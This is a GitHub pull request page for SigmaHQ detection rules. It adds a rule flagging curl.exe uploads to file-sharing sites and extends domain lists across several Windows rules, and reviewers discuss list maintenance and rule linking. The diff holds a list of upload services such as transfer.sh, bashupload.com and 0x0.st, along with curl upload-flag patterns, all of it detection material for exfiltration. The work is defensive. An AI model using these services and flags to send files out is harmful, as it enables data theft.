update: suspicious file activity related to file sharing websites #5574
update: suspicious file activity related to file sharing websites #5574swachchhanda000 wants to merge 5 commits intoSigmaHQ:masterfrom
Conversation
github-actions
bot
added
Rules
Windows
| - '0x0.st' | ||
| - 'bashupload.com' | ||
| - 'chunk.io' | ||
| - 'file.io' | ||
| - 'filebin.net' | ||
| - 'pastebin' | ||
| - 'send.firefox.com' | ||
| - 'temp.sh' | ||
| - 'transfer.sh' | ||
| - 'ufile.io' | ||
| - 'uploadfiles.io' | ||
| - 'wetransfer.com' | ||
| - 'x0.at' |
There was a problem hiding this comment.
You literally just updated other lists that are bigger. Please add them
There was a problem hiding this comment.
Well, I only added the domains that have documentation confirming curl support. Some domains are just for downloads, like cdn.discordapp.com. But I’ll check again to see if I missed any domains.
There was a problem hiding this comment.
And btw some of the pre-existing domains in these rules are dead/not-reachable like anonfiles.com, Should i remove them as well?
There was a problem hiding this comment.
Depends on their actual use i would say. If you still find samples on VT still communicating with them we keep in the proc creation related rules since it would highly mean they are bad.
rules/windows/process_creation/proc_creation_win_curl_upload_file_sharing_websites.yml
Outdated
Show resolved
Hide resolved
nasbench
added
the
Author Input Required
swachchhanda000
force-pushed
the
master
branch
from
a6254cb to
b9a91bb
Compare
nasbench
left a comment
nasbench
left a comment
There was a problem hiding this comment.
Double check my comment before merging
nasbench
added
Ready to Merge
and removed
2nd Review Needed
Author Input Required
swachchhanda000
force-pushed
the
curl_bashupload
branch
from
60eb862 to
cf2766d
Compare
| - ' -X POST' | ||
| - ' --request POST ' | ||
| - CommandLine|re: | ||
| - '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection |
There was a problem hiding this comment.
we have the cased modified for it , but not sure many backend support it by now🐈⬛
There was a problem hiding this comment.
We should start using it imo. This should be handled by the backend/pySigma.
phantinuss
force-pushed
the
curl_bashupload
branch
from
cf2766d to
711af16
Compare
phantinuss
added
Review Needed
This comment was marked as resolved.
This comment was marked as resolved.
Sorry, something went wrong.
| @@ -21,8 +21,11 @@ detection: | |||
| EventID: 854 | |||
| Path|contains: | |||
| - '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea) | |||
There was a problem hiding this comment.
All lists (such as here) that are the same and that should be maintained together should be linked in the metadata as "similar".
There was a problem hiding this comment.
All the rule should add a related similar to at least one rule
phantinuss
added
the
Author Input Required
frack113
left a comment
frack113
left a comment
There was a problem hiding this comment.
Need to link the rules with like proc_creation_win_curl_upload_file_sharing_websites.yml
5 participants
Summary of the Pull Request
Changelog
new - Curl File Upload To File Sharing Websites
update - Suspicious Remote AppX Package Locations - add more file sharing domains
update - BITS Transfer Job Download From File Sharing Domains - add more file sharing domains
update - Suspicious File Download From File Sharing Websites - File Stream - add more file sharing domains
update - Unusual File Download From File Sharing Websites - File Stream - add more file sharing domains
update - New Connection Initiated To Potential Dead Drop Resolver Domain - add more file sharing domains
update - Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - add more file sharing domains
update - Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - add more file sharing domains
update - Suspicious Download From File-Sharing Website Via Bitsadmin - add more file sharing domains
update - Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Curl.EXE - add more file sharing domains
update - Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Wget.EXE - add more file sharing domains
Example Log Event
Fixed Issues
SigmaHQ Rule Creation Conventions